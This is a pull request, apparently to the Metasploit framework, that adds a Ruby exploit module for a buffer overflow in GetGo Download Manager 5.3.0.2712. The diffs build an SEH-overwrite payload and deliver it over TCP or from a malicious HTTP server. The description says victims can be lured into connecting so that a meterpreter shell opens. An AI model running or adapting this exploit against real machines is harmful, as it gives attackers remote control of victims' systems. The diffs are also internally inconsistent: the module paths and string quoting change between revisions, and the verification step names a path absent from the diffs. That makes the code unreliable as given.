### PR TITLE
Add GetGo Download Manager bof exploit

### DIFF
--- a/documentation/modules/exploit/windows/misc/getgo_bof.md
+++ b/documentation/modules/exploit/windows/misc/getgo_bof.md
@@ -1,0 +1,4 @@
+## Description
+This modules adds a buffer overflow exploit for GetGo Download Manager 5.3.0.2712.
+Victim can be tricked to connect to attacker's ip which will open a meterpreter shell.
+This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)

--- a/modules/exploits/windows/browser/getgo_bof.rb
+++ b/modules/exploits/windows/browser/getgo_bof.rb
@@ -4,9 +4,9 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GreatRanking
+  Rank = NormalRanking
 
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::Seh
 
   def initialize(info = {})
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   end
 
-  def exploit
+  def on_request_uri(cli, request)
     seh = generate_seh_record(target.ret)
     nseh = "\xeb\x06\x90\x90"
     packet = make_nops(target['Offset'])
@@ -55,8 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
     packet << seh
     packet << payload.encoded
     packet << make_nops(4055 - payload.encoded.length)
-    connect
-
-    sock.put(packet)
+    print_status("sending the payload")
+    send_response(cli, packet)
   end
 end

--- a/modules/exploits/windows/misc/getgo_bof.rb
+++ b/modules/exploits/windows/misc/getgo_bof.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     seh = generate_seh_record(target.ret)
-    nseh = '\xeb\x06\x90\x90'
+    nseh = "\xeb\x06\x90\x90"
     packet = make_nops(target['Offset'])
     packet << nseh
     packet << seh

--- a/modules/exploits/windows/misc/getgo_bof.rb
+++ b/modules/exploits/windows/misc/getgo_bof.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'GetGo Download Manager bof',
       'Description'    => %q{
-				GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow.
+               GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -49,12 +49,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     seh = generate_seh_record(target.ret)
-	nseh = '\xeb\x06\x90\x90'
-	packet = make_nops(target['Offset'])
-	packet << nseh
-	packet << seh
-	packet << payload.encoded
-	packet << make_nops(4055 - payload.encoded.length)
+    nseh = '\xeb\x06\x90\x90'
+    packet = make_nops(target['Offset'])
+    packet << nseh
+    packet << seh
+    packet << payload.encoded
+    packet << make_nops(4055 - payload.encoded.length)
     connect
 
     sock.put(packet)

--- a/modules/exploits/windows/misc/getgo_bof.rb
+++ b/modules/exploits/windows/misc/getgo_bof.rb
@@ -58,6 +58,5 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
 
     sock.put(packet)
-    handler
   end
 end

--- a/modules/exploits/windows/misc/getgo_bof.rb
+++ b/modules/exploits/windows/misc/getgo_bof.rb
@@ -1,0 +1,63 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GetGo Download Manager bof',
+      'Description'    => %q{
+				GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bzyo'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00",
+          'Space'      => 800
+        },
+      'Targets'        =>
+        [
+          [ 'GetGo Download Manager v5.3.0.2712',
+            {
+              'Offset' => 20,
+              'Ret'    => 0x72d11f39
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 27 2018',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)])
+
+  end
+
+  def exploit
+    seh = generate_seh_record(target.ret)
+	nseh = '\xeb\x06\x90\x90'
+	packet = make_nops(target['Offset'])
+	packet << nseh
+	packet << seh
+	packet << payload.encoded
+	packet << make_nops(4055 - payload.encoded.length)
+    connect
+
+    sock.put(packet)
+    handler
+  end
+end


### PR DESCRIPTION
GetGo Download Manager 5.3.0.2712 - Buffer Overflow
https://www.exploit-db.com/exploits/44187/

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/getgo_bof`
- [x] set RHOST
- [x] exploit

